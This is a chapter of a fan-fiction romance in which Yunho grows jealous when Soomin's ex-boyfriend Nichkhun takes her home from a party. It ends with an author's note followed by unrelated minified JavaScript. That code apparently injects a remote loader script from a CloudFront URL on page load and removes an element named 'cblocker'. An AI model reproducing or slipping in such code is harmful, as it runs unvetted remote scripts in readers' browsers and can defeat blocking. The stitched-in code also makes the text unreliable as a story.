Chapter 19

The Will That Changed Their Lives

 

Your POV

 

Oh my effing god. Why now?!

“So, you’re husband is busy with COMPANY matters, eh?”

I had to nudge him to keep him quiet. Hyoran nodded at me and Yunho just smiled.

Don’t come near~

“You didn’t tell me you were going out, is this your friend?” He asked.

SERIOUSLY, JUNG YUNHO?! SERIOUSLY?!

Sometimes, being courteous and well-mannered is his number one flaw.

“Uhm, yeah, this is Ho Nichkhun, he’s my~”

“-ex boyfriend.” Khun oppa took out his hand. Yunho shook his hand with uncertainty. Hyoran was looking at me.

“Busy?” Khun whispered. I could tell he was laughing inside. Why did I even loosen up tonight? Well we were good friends before, chummy even. Until…well that happened. Back to the story, why did he have to tell that to Yunho?!

Wae? Wae? Wae?

“I’m Jung Yunho, Soomin’s~”

“-accidental husband, I know.” He nodded.

“Anyway, Khun oppa, this is Lee Hyoran.” I said. Khun nodded and shok her hand.

 

Yunho’s POV

 

I could see that Soomin was talking to this guy with her eyes. Are they close?

Then she started to cough a little.

“Let me get you something to drink.” I said as I gently shook off Hyo’s arm.

“No, I’m fine.” Soomin said. I looked at her once. Shw wouldn’t even meet my eyes.

“Fine? Yeah, right. Let’s go.” Nichkhun pulled her away and they approached the punch table.

She listens to him? Amazing.

I saw her smile as they conversed. She expresses herself to him.

“Isnt that odd?” Hyoran said.

“What?”

“Her ex-boyfriend’s here and somehow he knows about you two.”

I just nodded; I don’t even know what to say.

“Maybe he still has feelings for Soomin.” Hyoran smiled.

 

Narrator’s POV

 

Yunho couldn’t concentrate on anything. His eyes just kept on wandering to Nickhun and Soomin. He was annoyed why he was looking out for her, heck he doesn’t even know why. He was just worried, or so. But Hyoran could see it. The Jung Yunho was actually looking out for a chaebol daughter.

 

“Yunho, we’ll be going ahead.”

“Huh?”

“I’ll be bringing her home.” Khun said. Soomin nodded, then they went out.

Yunho was worried earlier, now he was really worried.

What if that ex boyfriend of hers will take advantage of her? It’s too dangerous and it was already dark.

He looked at Hyoran who was talking with her friend. He started to tap his foot on the marble floor restlessly. Want to know why?

He was anxious to get home.

 

Yunho’s POV

 

You’ve got to be kidding me, right? She’s okay with her ex boyfriend bringing her home? I shook my head.

Hyoran was still chatting with her friend and I cant really leave her here all alone. But what if that lawyer guy takes advantage of my wife~Soomin?!

I took a sip of champagne. Why am I feeling this way? Why am I worried? Am I being a hypocrite? She’s alone with me all the time, but then why am I worried this time?!

“It’s because she’s Changmin’s cousin, and he’d kill me if somehtinf happens.” I muttered. Then I saw Hyoran bid goodbye to her friend.

Finally.

“Let’s go?” She asked.

 

Narrator’s POV

 

Yunho nodded eagerly and he went out to bring his car around the curb.

“That was his wife?”Her friend asked. Hyoran just nodded.

“She’s really beautiful just like in the photos.”

“Yeah….she is.” Hyoran said.

“You’re not afraid?”

“Why would I be? Yunho loves me.” She stated as she looked at her friend straightly.

“Well, if I were you, don’t let go of him.”

“I know, he has everything. I shouldn’t let her grab him from me.” Hyoran nodded.

 

Yunho arrived hom after dropping Hyoran off. As soon as he saw her enter her door he drove in top speed to their house.

He parked his car at the curb and went down. On his way he took off his blazer and went to the kitchen to get a glass of water.

He was about to head upstairs to check on Soomin when he saw a pair of shoes sprawled carelessly on the floor. He walked closer to it then he saw a man’s coat and necktie a few steps away. His eyes widened and he walked quickly to the living room.

 

Yunho’s POV

 

Oh no, please no. Shim Changmin will definitely~

I made my way to the living room then I heard loud noises. Why are her shoes outside? Why did he take off his clothes?!

I entered the living room and found Soomin and her friend……playing with the Wii.

I sighed. Why did I get so hyped earlier anyway?! Why am I so worried? Its not like she cant take care of herself.

Soomin was actually having a lot fun. I thought she was awkward with him? I remember seeing this man for the first time, she didn’t want to talk to this guy.

I cleared my throat. The two of them looked at me.

“Oh, you’re home.” She nodded.

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

i was bored.... :>>

the yunho is worried.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};